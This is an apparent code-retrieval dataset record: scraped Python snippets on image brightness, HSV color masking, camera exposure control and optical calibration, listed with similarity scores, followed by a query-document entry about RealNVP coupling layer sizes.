filterNotInRange(sub1, LABmin, LABmax, cv2.COLOR_BGR2LAB)\n # sum2 = cv2.add(processedImage, processedImage3)\n\n kernel = np.ones((6, 6), np.uint8)\n temp = closing(processedImage, kernel)\n\n kernel = np.ones((3, 3), np.uint8)\n out = opening(temp, kernel)\n\n if debug:\n cv2.imshow('processedImage1', processedImage1)\n cv2.imshow('processedImage2', processedImage2)\n cv2.imshow('processedImage3', processedImage3)\n cv2.imshow('sum1', sum1)\n cv2.imshow('sub1', sub1)\n cv2.imshow('processedImage', processedImage)\n cv2.imshow('sum2', sum2)\n cv2.imshow('out', out)\n\n return out", "def get_object(img, color,cam='front'):\n if color == \"yellow\":\n if cam == \"front\":\n hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n lower = np.array([15, 146, 0], dtype=np.uint8)\n upper = np.array([62, 255, 255], dtype=np.uint8)\n mask = cv.inRange(hsv, lower, upper)\n if cam == \"bottom\":\n hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n lower = np.array([15, 146, 0], dtype=np.uint8)\n upper = np.array([62, 255, 255], dtype=np.uint8)\n mask = cv.inRange(hsv, lower, upper)\n elif color == \"red\":\n if world == \"real\":\n hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n lower1 = np.array([0, 39, 17], dtype=np.uint8)\n upper1 = np.array([32, 208, 115], dtype=np.uint8)\n lower2 = np.array([122, 39, 17], dtype=np.uint8)\n upper2 = np.array([180, 208, 115], dtype=np.uint8)\n mask1 = cv.inRange(hsv, lower1, upper1)\n mask2 = cv.inRange(hsv, lower2, upper2)\n mask = cv.bitwise_or(mask1, mask2)\n if world == \"sim\":\n hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n lower1 = np.array([0, 85, 12], dtype=np.uint8)\n upper1 = np.array([11, 234, 234], dtype=np.uint8)\n lower2 = np.array([158, 85, 12], dtype=np.uint8)\n upper2 = np.array([180, 234, 234], dtype=np.uint8)\n mask1 = cv.inRange(hsv, lower1, upper1)\n mask2 = cv.inRange(hsv, lower2, upper2)\n mask = cv.bitwise_or(mask1, mask2)\n return mask", "def adjust_brightness(img, brightness_factor):\n _assert_image_tensor(img, 'CHW')\n assert brightness_factor >= 0, \"brightness_factor should be non-negative.\"\n assert _get_image_num_channels(img, 'CHW') in [\n 1,\n 3,\n ], \"channels of input should be either 1 or 3.\"\n\n extreme_target = paddle.zeros_like(img, img.dtype)\n return _blend_images(img, extreme_target, brightness_factor)", "def mouseImage(event, x, y, flags, param):\n \n if event==cv.CV_EVENT_LBUTTONDOWN: #Clicked the left button\n print \"x, y are\", x, y\n (b,g,r) = D.image[y,x]\n print \"r,g,b is\", int(r), int(g), int(b)\n (h,s,v) = D.hsv[y,x]\n print \"h,s,v is\", int(h), int(s), int(v)\n D.down_coord = (x,y)\n D.mouse_down = True\n \n elif event==cv.CV_EVENT_LBUTTONUP: #Let go of the left button\n print \"x, y are\", x, y\n (b,g,r) = D.image[y,x]\n print \"r,g,b is\", int(r), int(g), int(b)\n (h,s,v) = D.hsv[y,x]\n print \"h,s,v is\", int(h), int(s), int(v)\n D.up_coord = (x,y)\n D.mouse_down = False\n\n if D.mode == \"clear\":\n D.sections = []\n else: #Start, add, or subtract -- put lower coordinates first\n x0, y0, x1, y1 = D.down_coord[0], D.down_coord[1], D.up_coord[0], D.up_coord[1]\n\n if x0 > x1:\n x0, x1 = x1, x0\n if y0 > y1:\n y0, y1 = y1, y0\n \n if D.mode == \"start\":\n D.sections = []\n mode_dict = {\"start\":'a', \"add\":'a', \"subtract\":'s'}\n D.sections.append([mode_dict[D.mode], (x0, y0), (x1, y1)])\n ImageProcessing.process_section(D)\n\n\n elif event == cv.CV_EVENT_RBUTTONDOWN: #Right click\n D.target_coord = (x, y)\n ImageProcessing.target_coord(D)\n\n\n elif D.mouse_down and event==cv.CV_EVENT_MOUSEMOVE: #Mouse just moved\n D.up_coord = (x,y)", "def __opacity_slider(self, s):\n if len(self.__robots) > 0:\n self.__robots[self.__selected_robot].set_transparency(s.value)", "def testConstantBoundedField(self):\n photoCalib = lsst.afw.image.PhotoCalib(self.constantCalibration)\n self._testPhotoCalibCenter(photoCalib, 0)\n\n self.assertEqual(1, photoCalib.instFluxToMaggies(self.instFlux, self.pointYShift))\n self.assertEqual(0, photoCalib.instFluxToMagnitude(self.instFlux, self.pointYShift))\n self.assertFloatsAlmostEqual(1e-9, photoCalib.instFluxToMaggies(self.instFlux*1e-9, self.pointXShift))\n self.assertFloatsAlmostEqual(22.5, photoCalib.instFluxToMagnitude(\n self.instFlux*1e-9, self.pointXShift))\n\n photoCalib = lsst.afw.image.PhotoCalib(self.constantCalibration, self.calibrationErr)\n self._testPhotoCalibCenter(photoCalib, self.calibrationErr)", "def adjustBrightness(img, fac):\n img2 = np.float32(img) * fac\n img2 = img2.clip(min=0, max=255)\n return np.uint8(img2)", "def runPass(self, exposure_range, rate):\n r = rospy.Rate(rate)\n for i, exposure in enumerate(exposure_range):\n if rospy.is_shutdown():\n break\n\n self.current_exposure = exposure\n self.client.update_configuration(\n {\"exposure\": self.current_exposure})\n r.sleep()\n\n finished = (i >= (len(exposure_range)-1))\n if finished:\n optimal_exposure = max(self.scores, key=self.scores.get)\n self.reset()\n return optimal_exposure # an optimal exposure has been found\n else:\n return -1", "def _normed_jet_exposure_between_bounds(self,\n concentration_model: ConcentrationModel,\n time1: float, time2: float):\n start, stop = self.extract_between_bounds(time1, time2)\n jet_origin = self.expiration.jet_origin_concentration()\n return jet_origin * (stop - start)", "def enhanceContrast(image, mask, target_path, name, save=False):\n \n\n \n # Contrast stretching\n p2, p98 = np.percentile(image, (2, 98))\n image_rescale = exposure.rescale_intensity(image, in_range=(p2, p98))\n \n # Equalization\n image_eq = exposure.equalize_hist(image)\n \n # Adaptive Equalization\n image_adapteq = exposure.equalize_adapthist(image, clip_limit=0.03)\n \n # Display results\n fig = plt.figure(figsize=(19, 13))\n axes = np.zeros((2, 4), dtype=np.object)\n axes[0, 0] = fig.add_subplot(2, 4, 1)\n for i in range(1, 4):\n axes[0, i] = fig.add_subplot(2, 4, 1+i, sharex=axes[0,0], sharey=axes[0,0])\n for i in range(0, 4):\n axes[1, i] = fig.add_subplot(2, 4, 5+i)\n \n ax_image, ax_hist, ax_cdf = plot_image_and_hist(image, mask, mask_cmap, img_cmap,\n axes[:, 0])\n ax_image.set_title('Low contrast image')\n \n y_min, y_max = ax_hist.get_ylim()\n ax_hist.set_ylabel('Number of pixels')\n ax_hist.set_yticks(np.linspace(0, y_max, 5))\n \n ax_image, ax_hist, ax_cdf = plot_image_and_hist(image_rescale, mask, mask_cmap, img_cmap,\n axes[:, 1])\n ax_image.set_title('Contrast stretching')\n \n ax_image, ax_hist, ax_cdf = plot_image_and_hist(image_eq, mask, mask_cmap, img_cmap,\n axes[:, 2])\n ax_image.set_title('Histogram equalization')\n \n ax_image, ax_hist, ax_cdf = plot_image_and_hist(image_adapteq,mask, mask_cmap, img_cmap,\n axes[:, 3])\n ax_image.set_title('Adaptive equalization')\n \n ax_cdf.set_ylabel('Fraction of total intensity')\n ax_cdf.set_yticks(np.linspace(0, 1, 5))\n \n # prevent overlap of y-axis labels\n fig.tight_layout()\n if save:\n plt.savefig(os.path.join(target_path, name))\n else:\n plt.show()\n plt.close()\n return image_adapteq", "def _set_slider_value(self, slider, name):\n val = slider.get_value()\n val /= 127\n # Change brightness, contrast or saturation\n self._manipulations[name] = val\n # Run the manipulation function\n self._apply()", "def expose(self):\n if self.camera is None: # test mode -- immediately return test image\n print(\"NO SPECTRAL CAMERA FOUND -- USING TEST DATA\")\n self.filename = \"example_fits_files/Mooi\"\n return\n\n exposure_time = self.time.get()\n try:\n self.exposure_time = float(exposure_time)\n except:\n message = \"Exposure time \\\"{0}\\\" cannot be converted to floating point number\".format(exposure_time)\n messagebox.showerror(\"Error\", message)\n raise ValueError(message)\n filename = \"spectra/{0}\".format(timestamp())\n self.camera.spectrum(self.exposure_time, filename)\n self.filename = filename", "def gamma_slide(self):\r\n gamma_input = self.horizontal.get() # Get the user input of gamma\r\n img = self.master.images[-1] # Choose the displayed image to perform gamma correcting\r\n hsv_image = cv2.cvtColor(img, cv2.COLOR_BGR2HSV) # Convert the BGR to HSV type\r\n transformed_dim = gamma.gamma_correct(hsv_image[:, :, 2], gamma_input) # Perform gamma correcting on the\r\n # 'V' channel\r\n hsv_image[:, :, 2] = transformed_dim # Set the 'V' channel of the original image as the gamma corrected one\r\n color_image = cv2.cvtColor(hsv_image, cv2.COLOR_HSV2BGR) # Reconvert back the image to BGR\r\n self.master.display_image.display_image(img=color_image) # Display the reconverted image on the screen\r\n self.master.images.append(color_image) # Append the transformed image to the stack\r", "def extract_single_color_range(self, image,hsv,lower,upper):\n mask = cv2.inRange(hsv, lower, upper)\n res = cv2.bitwise_and(image,image, mask= mask)\n\n res = cv2.medianBlur(res, 5)\n return res", "def adjust_brightness(image, mask, gamma):\r\n\r\n\tassert image.shape[:2] == mask.shape and gamma > 0\r\n\r\n\t## to increase the number of channel of the mask to three so that we can apply the masks\r\n\t## to image\r\n\tmasks = np.stack([mask, mask, mask], axis = -1)\r\n\r\n\tscale = float(dtype_limits(image, True)[1] - dtype_limits(image, True)[0])\r\n\r\n\toutput = np.where(masks == 1,\r\n\t\t\t\t\t\t(image / scale) ** (1 / gamma) * scale,\r\n\t\t\t\t\t\timage)\r\n\r\n\t## to make sure the pixel intensity is within the range of uint8\r\n\toutput = np.clip(output, 0, 255).astype(np.uint8)\r\n\r\n\treturn output", "def change_brightness_conv(image, value):\n image = rescale_image_0255(image)\n image = change_brightness(image, value)\n return rescale_image_01(image)", "def refocus(opt_model):\n osp = opt_model['optical_spec']\n\n fld = osp['fov'].fields[0] # assumed to be the axial field\n wvl = osp['wvls'].central_wvl\n\n df_ray, ray_op, wvl = trace_safe(opt_model, [0., 1.], fld, wvl, \n output_filter=None, rayerr_filter='full', \n use_named_tuples=True)\n\n defocus = -df_ray[-1].p[1]/(df_ray[-2].d[1]/df_ray[-2].d[2])\n\n return defocus", "def pre_processing_image(img):\n\n #print(img.shape)\n # apply gamma correction and show the images\n #adjusted = adjust_gamma(img, gamma=0.65)\n\n adjusted = exposure.adjust_gamma(img, gamma=1.65)\n #print(adjusted.shape)\n\n # log transform of image\n\n logarithmic_corrected = exposure.adjust_log(adjusted, 1)\n #print(logarithmic_corrected.shape)\n\n # denoising\n #dst2 = cv2.fastNlMeansDenoisingColored(logarithmic_corrected, None, 10, 10, 7, 21)\n #print(dst2.shape)\n dst2 = logarithmic_corrected\n return dst2", "def _hold_bounds(self):\n adc_channel = self.graph_renderer.channels[0]\n if self.sx2 > adc_channel.size():\n self.anchored = True\n\n if self.anchored:\n # anchor right side of the window to the last graph sample. so the graph always animates, grows out from\n # the right side of the window. (anchor sx2 to adc_channel.size())\n dx = self.sx2 - adc_channel.size()\n dxw = self.wsx2 - adc_channel.size()\n self.sx1 -= dx\n self.sx2 -= dx\n self.wsx1 -= dxw\n self.wsx2 -= dxw\n\n # eliminate integer overflow problems. only allow indices smaller than a 32bit integer value. and then divide\n # it by four just to be sure.. maybe it's not necessary, but maybe there are some other tricks used in the\n # graph rendering..\n bound = 0xffffffff / 4\n # hmm. this allows only 12 days of data with ~960Hz. time to go 64bit?\n self.sx1 = max(self.sx1, -bound)\n self.sy1 = max(self.sy1, -bound)\n self.sx1 = min(self.sx1, bound)\n self.sy1 = min(self.sy1, bound)\n self.sx2 = max(self.sx2, -bound)\n self.sy2 = max(self.sy2, -bound)\n self.sx2 = min(self.sx2, bound)\n self.sy2 = min(self.sy2, bound)\n self.wsx1 = max(self.wsx1, -bound)\n self.wsy1 = max(self.wsy1, -bound)\n self.wsx1 = min(self.wsx1, bound)\n self.wsy1 = min(self.wsy1, bound)\n self.wsx2 = max(self.wsx2, -bound)\n self.wsy2 = max(self.wsy2, -bound)\n self.wsx2 = min(self.wsx2, bound)\n self.wsy2 = min(self.wsy2, bound)\n\n # limit horizontal zoom to 2 samples. can't zoom in anymore if less than one sample stays on screen.\n # don't have time to implement and test line segment cutting, if one sample is outside the window, and another\n # is inside.\n if self.wsx2 - self.wsx1 < 2.:\n self.wsx2 = self.wsx1 + 2.\n if self.sx2 - self.sx1 < 2.:\n self.sx2 = self.sx1 + 2.\n\n #\n # limit vertical movement and vertical zoom\n #\n\n val_min = adc_channel.value_min\n val_max = adc_channel.value_max\n\n # allow offset of this percent/100 of the screen\n overlap = .30\n\n # top of the screen has smaller sample values than bottom of the screen. inverted graph.\n # sy1 is top pixel, sy2 bottom. bottom-left coordinat is (0, 0)\n if self.sy1 < self.sy2:\n val_top = val_min + (self.wsy1 - self.wsy2) * overlap\n val_bottom = val_max - (self.wsy1 - self.wsy2) * overlap\n if self.wsy1 < val_top:\n self.wsy2 -= self.wsy1 - val_top\n self.wsy1 = val_top\n if self.wsy2 > val_bottom:\n self.wsy1 += val_bottom - self.wsy2\n self.wsy2 = val_bottom\n if self.wsy1 < val_top:\n self.wsy1 = val_top\n if self.wsy2 > val_bottom:\n self.wsy2 = val_bottom\n else:\n val_bottom = val_min - (self.wsy1 - self.wsy2) * overlap\n val_top = val_max + (self.wsy1 - self.wsy2) * overlap\n if self.wsy1 > val_top:\n self.wsy2 -= self.wsy1 - val_top\n self.wsy1 = val_top\n if self.wsy2 < val_bottom:\n self.wsy1 += val_bottom - self.wsy2\n self.wsy2 = val_bottom\n if self.wsy1 > val_top:\n self.wsy1 = val_top\n if self.wsy2 < val_bottom:\n self.wsy2 = val_bottom", "def guider(x=0,y=0):\n if x==0 and y==0 and (gzero.gxoff<>0 or gzero.gyoff<>0):\n opticalcoupler.HomeXYStage()\n opticalcoupler.MoveXYStage( x=(x+gzero.gxoff), y=(y+gzero.gyoff) )\n camera.status.guider = (x,y)", "def camera(self):\n self.spectrum = self.spectrum", "def run_calib(projector=OPTOMA_HD33()):\n w, h = (0.2160, 0.2794)\n obj_points = np.array([[-w/2, h/2, 0], [w/2, h/2, 0],\n [-w/2, 0, 0], [w/2, 0, 0],\n [-w/2, 0, h/2], [w/2, 0, h/2]])\n\n global img_points, going\n img_points = []\n\n try:\n window = Window()\n window.MoveXY(1600,0)\n window.ShowFullScreen(True)\n going = True\n\n @window.eventx\n def EVT_MOUSE_EVENTS(evt):\n global going, img_points\n if evt.ButtonUp(wx.MOUSE_BTN_LEFT):\n img_points.append(evt.Position)\n print('Picked point %d of 6' % (len(img_points)))\n if len(img_points) == len(obj_points):\n print \"Done\"\n going = False\n\n print(\"\"\"[Extrinsic Calibration] \n\nThere should be 6 points marked on the table and backdrop. \nMoving the mouse over the projected display, click each of the points\nin order:\n (left top, on the backdrop),\n (right top, on the backdrop),\n (left center, on the crease),\n (right center, on the crease),\n (left bottom, on the table),\n (right bottom, on the table)\n\nFollow along with this illustration: http://imgur.com/asfsfd.jpg\n\nClick the six points:\n\"\"\")\n\n while going: cv.WaitKey(10)\n\n finally:\n window.Close()\n\n img_points = np.array(img_points, 'f')\n projector.calibrate_extrinsic(img_points, obj_points)\n\n np.save('%s/config/projector' % (newest_folder), (projector.KK, projector.RT))\n print('OK')", "def blur_released(self, event):\r\n if self.winfo_containing(event.x_root, event.y_root) == self.blur_button: # If clicked area has the blur button\r\n if self.image_present_check(): # Check if there is a displayed image else throw an error box\r\n self.horizontal = Scale(self, from_=0.00, to=100.00, resolution = 0.5, orient=HORIZONTAL) # Invoke a \r\n # slider to take the user input for standard deviation\r\n self.horizontal.pack() # Pack it onto GUI screen\r\n blur_button = Button(self, text=\"Set STD of Gaussian Window\", command=self.blur_slide).pack() # Button \r\n # for the user to input their chosen value. When the user clicks it blur_slide function is called\r", "def adjust_brightness(img, brightness_factor):\n if not _is_numpy_image(img):\n raise TypeError('img should be CV Image. Got {}'.format(type(img)))\n\n im = img.astype(np.float32) * brightness_factor\n im = im.clip(min=0, max=255)\n return im.astype(img.dtype)", "def exposure(frameType, expTime):\n\n blobEvent.clear() \n\n # set the specified frame type\n if frameType.lower() == 'light':\n ccd_frame[0].s = PyIndi.ISS_ON\n ccd_frame[1].s = PyIndi.ISS_OFF\n ccd_frame[2].s = PyIndi.ISS_OFF\n ccd_frame[3].s = PyIndi.ISS_OFF \n indiclient.sendNewSwitch(ccd_frame)\n elif frameType.lower() == 'bias':\n ccd_frame[0].s = PyIndi.ISS_OFF\n ccd_frame[1].s = PyIndi.ISS_ON\n ccd_frame[2].s = PyIndi.ISS_OFF\n ccd_frame[3].s = PyIndi.ISS_OFF \n indiclient.sendNewSwitch(ccd_frame)\n elif frameType.lower() == 'dark':\n ccd_frame[0].s = PyIndi.ISS_OFF\n ccd_frame[1].s = PyIndi.ISS_OFF\n ccd_frame[2].s = PyIndi.ISS_ON\n ccd_frame[3].s = PyIndi.ISS_OFF \n indiclient.sendNewSwitch(ccd_frame)\n elif frameType.lower() == 'flat':\n ccd_frame[0].s = PyIndi.ISS_OFF\n ccd_frame[1].s = PyIndi.ISS_OFF\n ccd_frame[2].s = PyIndi.ISS_OFF\n ccd_frame[3].s = PyIndi.ISS_ON \n indiclient.sendNewSwitch(ccd_frame)\n\n # set the value for the next exposure\n ccd_exposure[0].value=expTime\n\n indiclient.sendNewNumber(ccd_exposure)\n\n # wait for the exposure\n blobEvent.wait()\n\n for blob in ccd_ccd1:\n # pyindi-client adds a getblobdata() method to IBLOB item\n # for accessing the contents of the blob, which is a bytearray in Python\n image_data=blob.getblobdata()\n\n # write the byte array out to a FITS file\n global imgNum\n global imgName\n imgNum += 1\n fileName = fileDir+'raw-'+str(imgNum).zfill(8)+'.fits'\n f = open(fileName, 'wb')\n f.write(image_data)\n f.close()\n imgName = fileName\n \n return fileName", "def resize_frame(event,x,y,flags,param):\t\t\n global upperPt, lowerPt, frame\n if event == cv2.EVENT_LBUTTONDOWN:\n upperPt = [(x,y)]\n print upperPt\n if event == cv2.EVENT_LBUTTONUP:\n lowerPt = [(x,y)]\n print lowerPt\n cv2.rectangle(frame, upperPt[0], lowerPt[0],(0,0,0),1)\n cv2.destroyWindow('Select region of interest')\t\t\t\n #crop frame\n frame = frame[upperPt[0][1]:lowerPt[0][1],upperPt[0][0]:lowerPt[0][0]]\n cv2.imwrite('resized.jpg',frame)\n frame = histNorm(frame)\n print('Resize successful')\n cv2.imshow('Select region of interest', frame)\t\n\n color_data[\"upperPt\"] = upperPt\n color_data[\"lowerPt\"] = lowerPt", "def closed_zone(self, tissue):\n img_cv2_mask = self.pressure_img.mask\n self.pressure_img.roi_crop(img_cv2_mask, tissue)", "def Focus_beam(Collimated_Pupil, pad_width = 0):\n\n Collimated_Pupil_padded = np.pad(Collimated_Pupil,pad_width=int(pad_width),mode='constant') \n\n f = np.fft.fft2(Collimated_Pupil_padded) #must be complex amplitude going in here\n fshift = np.fft.fftshift(f)\n intensity_image = (np.abs(fshift))**2\n \n return intensity_image", "def exercise2b(self):\n self.b2 = calibrate_image(self.b1)\n plt.axis('off')\n plt.imshow(self.b2)\n plt.show()\n misc.imsave(\"B2.png\", self.b2)\n misc.imsave(\"B2_Brightness.png\", print_brightness(self.b2))", "def __init__(self, lf, width= None, height= None, sensitivity=2):\n super().__init__(size=(width, height))\n \n # Adjustable dimensions of the canvas and mouse sensitivity\n self.width = width or lf.shape[-2]\n self.height = height or lf.shape[-3]\n self.dim = lf.ndim\n self.sensitivity = sensitivity\n self.display_image = IpyImage()\n out_width = width//2\n out_height = 3*height//(4)\n slider_height = height - out_height\n self.out = Output(layout={'border': '1px solid black', 'width': f'{out_width}px', 'height': f'{out_height}px'})\n \n # Prepare the lightfields to be rendered with the self.draw function()\n self.lf = self.convert_lf(lf)\n self.downsampled_lf = self.downsample_lf(self.lf)\n \n if self.dim == 6:\n self.u_min, self.u_max = 0, self.lf.shape[1]-1\n self.v_min, self.v_max = 0, self.lf.shape[2]-1\n self.z_min, self.z_max = 0, self.lf.shape[0]-1\n elif self.dim == 5:\n self.u_min, self.u_max = 0, self.lf.shape[0]-1\n self.v_min, self.v_max = 0, self.lf.shape[1]-1\n self.z_min, self.z_max = 0, 0\n elif self.dim == 4:\n self.u_min, self.u_max = 0, 0\n self.v_min, self.v_max = 0, 0\n self.z_min, self.z_max = 0, self.lf.shape[0]-1\n else:\n raise Exception(\"unexpected number of dimensions for lightfield\")\n \n self.slider = IntSlider(min=0, max=self.z_max, value=0, description= 'Z',\n layout={'width': '', 'height': f'{slider_height}px',\n 'flex-flow': 'column', 'align-self': 'left'})\n self.slider.observe(self.handle_zoom_change, names='value')\n\n self.dragging = False\n self.x_mouse = None\n self.y_mouse = None\n \n self.u_idx = self.u_max//2\n self.v_idx = self.v_max//2\n self.z_idx = 0\n \n #Initialize state\n self.draw()\n \n self.on_mouse_down(self.mouse_down_handler)\n self.on_mouse_move(self.mouse_move_handler)\n self.on_mouse_up(self.mouse_up_handler)\n self.on_mouse_out(self.mouse_out_handler)", "def adaptiveContrast(image, mask, target_path, name, kernel_sizes, save=False):\n\n transforms = []\n for kernel_size in kernel_sizes:\n image_adapteq = exposure.equalize_adapthist(image, kernel_size=kernel_size, clip_limit=0.03)\n transforms.append(image_adapteq)\n \n # Display results\n fig = plt.figure(figsize=(19, 16))\n axes = np.zeros((2, 5), dtype=np.object)\n axes[0, 0] = fig.add_subplot(2, 5, 1)\n for i in range(1, 5):\n axes[0, i] = fig.add_subplot(2, 5, 1+i, sharex=axes[0,0], sharey=axes[0,0])\n for i in range(0, 5):\n axes[1, i] = fig.add_subplot(2, 5, 6+i)\n \n ax_image, ax_hist, ax_cdf = plot_image_and_hist(transforms[0], mask, mask_cmap, img_cmap,\n axes[:, 0])\n ax_image.set_title('%d' %kernel_sizes[0])\n \n y_min, y_max = ax_hist.get_ylim()\n ax_hist.set_ylabel('Number of pixels')\n ax_hist.set_yticks(np.linspace(0, y_max, 5))\n \n ax_image, ax_hist, ax_cdf = plot_image_and_hist(transforms[1], mask, mask_cmap, img_cmap,\n axes[:, 1])\n ax_image.set_title('%d' %kernel_sizes[1])\n \n ax_image, ax_hist, ax_cdf = plot_image_and_hist(transforms[2], mask, mask_cmap, img_cmap,\n axes[:, 2])\n ax_image.set_title('%d' %kernel_sizes[2])\n \n ax_image, ax_hist, ax_cdf = plot_image_and_hist(transforms[3],mask, mask_cmap, img_cmap,\n axes[:, 3])\n ax_image.set_title('%d' %kernel_sizes[3])\n \n \n ax_image, ax_hist, ax_cdf = plot_image_and_hist(transforms[4],mask, mask_cmap, img_cmap,\n axes[:, 4])\n ax_image.set_title('%d' %kernel_sizes[4])\n \n ax_cdf.set_ylabel('Fraction of total intensity')\n ax_cdf.set_yticks(np.linspace(0, 1, 5))\n \n # prevent overlap of y-axis labels\n fig.tight_layout()\n if save:\n plt.savefig(os.path.join(target_path, name))\n else:\n plt.show()\n plt.close()\n\n return image_adapteq", "def focus(self, smooth=0):\n if self.image is None:\n self.load_image()\n # image = self.load_image()\n # print self.image\n if not self.bw:\n gray = rgb_2_gray(self.image)\n else:\n gray = self.image\n sx = ndimage.filters.sobel(gray, axis=0, mode='constant')\n sy = ndimage.filters.sobel(gray, axis=1, mode='constant')\n sob = np.hypot(sx, sy)\n self.image = None\n self.sob = sob\n if smooth > 0:\n sob = ndimage.filters.gaussian_filter(sob, sigma=smooth)\n return sob", "def autoExposure(this, **kargs):\n\t\t\n\t\t# Arguments\n\t\tframes = kargs.get('frames', 4)\n\t\tstart = kargs.get('start', -10)\n\t\tend = kargs.get('start', -3)\n\t\t\n\t\tmax = 0\n\t\tv = start\n\t\tprint 'Auto Exposition starting...'\n\t\t\n\t\tfor i in range(start, end):\n\t\t\tthis.setProp('exposure', i)\n\t\t\tfor j in range(frames): this.getFrame()\n\t\t\t\n\t\t\te = imEntropy(this.frame)\n\t\t\tif e > max:\n\t\t\t\tmax = e\n\t\t\t\tv = i\n\t\t\n\t\tthis.setProp('exposure', v)\n\t\tfor j in range(frames): this.getFrame()\n\t\tprint 'Exposure Calibrated: %i / Entropy: %.4f' % (v, max)", "def broaden_mask(img, threshold=0.05, qual=None):\n if not np.any(qual):\n qual = DerivativeVariance(img.phase)\n qual = qual[img.mask==True].max()*1.1 - qual\n max_value = qual[img.mask==True].max()\n img['mask'][qual<max_value*threshold] = False", "def windowing(im, win):\n im1 = im.astype(float)\n im1 -= win[0]\n im1 /= win[1] - win[0]\n im1[im1 > 1] = 1\n im1[im1 < 0] = 0\n im1 *= 255\n return im1", "def adjust_brightness(brightness_factor: float) -> Callable:\n return lambda img: TF.adjust_brightness(img, brightness_factor)", "def apply_camshift(roi_box, termination, roi_hist):\n global frame, roi_points, input_mode\n\n # calculate back projection for the ROI\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n back_projection = cv2.calcBackProject([hsv], [0], roi_hist, [0, 180], 1)\n\n # apply the camshift algorithm to the ROI\n r, roi_box = cv2.CamShift(back_projection, roi_box, termination)\n points = np.int0(cv2.boxPoints(r))\n cv2.polylines(frame, [points], True, (0, 255, 0), 2)", "def filterNotInRange(frame, min, max, colorMode):\n\n tempFrame = cv2.cvtColor(frame, colorMode)\n\n mask = cv2.inRange(tempFrame, min, max)\n\n filtered_frame = cv2.bitwise_and(frame, frame, mask=mask)\n\n return filtered_frame", "def _long_range_normed_exposure_between_bounds(self, time1: float, time2: float) -> _VectorisedFloat:\n exposure = 0.\n for start, stop in self.exposed.presence_interval().boundaries():\n if stop < time1:\n continue\n elif start > time2:\n break\n elif start <= time1 and time2<= stop:\n exposure += self.concentration_model.normed_integrated_concentration(time1, time2)\n elif start <= time1 and stop < time2:\n exposure += self.concentration_model.normed_integrated_concentration(time1, stop)\n elif time1 < start and time2 <= stop:\n exposure += self.concentration_model.normed_integrated_concentration(start, time2)\n elif time1 <= start and stop < time2:\n exposure += self.concentration_model.normed_integrated_concentration(start, stop)\n return exposure", "def clamp(self):\n self.threshold.data.clamp_(self.min_threshold)" ]
[ "0.59731835", "0.5947797", "0.5704381", "0.5572308", "0.5527399", "0.54456806", "0.54195607", "0.5414224", "0.5396532", "0.53867406", "0.5374971", "0.5353075", "0.52843153", "0.52828944", "0.52818215", "0.52474177", "0.5239085", "0.5233961", "0.52310765", "0.52299416", "0.52266705", "0.5224868", "0.5223007", "0.5221212", "0.5221138", "0.5214281", "0.5205405", "0.52037317", "0.519206", "0.5187612", "0.5182267", "0.5171457", "0.5164433", "0.515469", "0.51528746", "0.5146397", "0.51317155", "0.51307803", "0.51288444", "0.5128402", "0.512338", "0.5117042", "0.5116776", "0.51139134", "0.5108193", "0.51063395", "0.5105254", "0.50824887", "0.50775254", "0.5072762", "0.5062616", "0.505408", "0.5050529", "0.5048969", "0.50470597", "0.5036004", "0.5028597", "0.50208676", "0.50205076", "0.50179225", "0.5003967", "0.50030124", "0.5001547", "0.49916875", "0.49875998", "0.49870545", "0.49865347", "0.49769694", "0.49730647", "0.49647322", "0.49625355", "0.49585187", "0.49563694", "0.49549967", "0.49502325", "0.49494746", "0.4947271", "0.4944898", "0.49405986", "0.49394417", "0.49366677", "0.49318978", "0.4929327", "0.4928529", "0.492729", "0.49236122", "0.49226892", "0.49188837", "0.49171722", "0.4911002", "0.4910043", "0.49089897", "0.49069613", "0.4901093", "0.48912355", "0.48910746", "0.48869142", "0.48866764", "0.48799437", "0.48762742" ]
0.71824807
0
We specify the FNN based networks over here. A single network produce both s and t parts. Coupling Layer currently comprises of 1 full transform but this can be made more complex.
def coupling_layer_specifications(hyper_params): D = hyper_params['data_dim'] H = hyper_params['rnvp_num_hidden_units'] d_1 = np.int(D//2) if D%2 == 0 else np.int(D//2) + 1 d_2 = np.int(D - d_1) assert(d_1 + d_2 == D) coupling_layer_sizes = [] coupling_layer_sizes.append([d_1, H, H, 2*d_2]) coupling_layer_sizes.append([d_2, H, H, 2*d_1]) return coupling_layer_sizes
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, channel):\n super(CoarseFineFlownet, self).__init__()\n in_c = channel * 2\n conv1 = nn.Sequential(nn.Conv2d(in_c, 24, 5, 2, 2), nn.ReLU(True))\n conv2 = nn.Sequential(nn.Conv2d(24, 24, 3, 1, 1), nn.ReLU(True))\n conv3 = nn.Sequential(nn.Conv2d(24, 24, 5, 2, 2), nn.ReLU(True))\n conv4 = nn.Sequential(nn.Conv2d(24, 24, 3, 1, 1), nn.ReLU(True))\n conv5 = nn.Sequential(nn.Conv2d(24, 32, 3, 1, 1), nn.Tanh())\n up1 = nn.PixelShuffle(4)\n self.coarse_flow = nn.Sequential(conv1, conv2, conv3, conv4, conv5, up1)\n in_c = channel * 3 + 2\n conv1 = nn.Sequential(nn.Conv2d(in_c, 24, 5, 2, 2), nn.ReLU(True))\n conv2 = nn.Sequential(nn.Conv2d(24, 24, 3, 1, 1), nn.ReLU(True))\n conv3 = nn.Sequential(nn.Conv2d(24, 24, 3, 1, 1), nn.ReLU(True))\n conv4 = nn.Sequential(nn.Conv2d(24, 24, 3, 1, 1), nn.ReLU(True))\n conv5 = nn.Sequential(nn.Conv2d(24, 8, 3, 1, 1), nn.Tanh())\n up2 = nn.PixelShuffle(2)\n self.fine_flow = nn.Sequential(conv1, conv2, conv3, conv4, conv5, up2)\n self.warp_c = STN(padding_mode='border')", "def __init__(self):\n super(DLStudio.ExperimentsWithCIFAR.Net2, self).__init__()\n self.relu = nn.ReLU()\n strides = []\n patch_size = 2\n ## conv1:\n out_ch, ker_size, conv_stride, pool_stride = 128,5,1,2\n self.conv1 = nn.Conv2d(3, out_ch, (ker_size,ker_size), padding=(ker_size-1)//2) \n self.pool1 = nn.MaxPool2d(patch_size, pool_stride) \n strides += (conv_stride, pool_stride)\n ## conv2:\n in_ch = out_ch\n out_ch, ker_size, conv_stride, pool_stride = 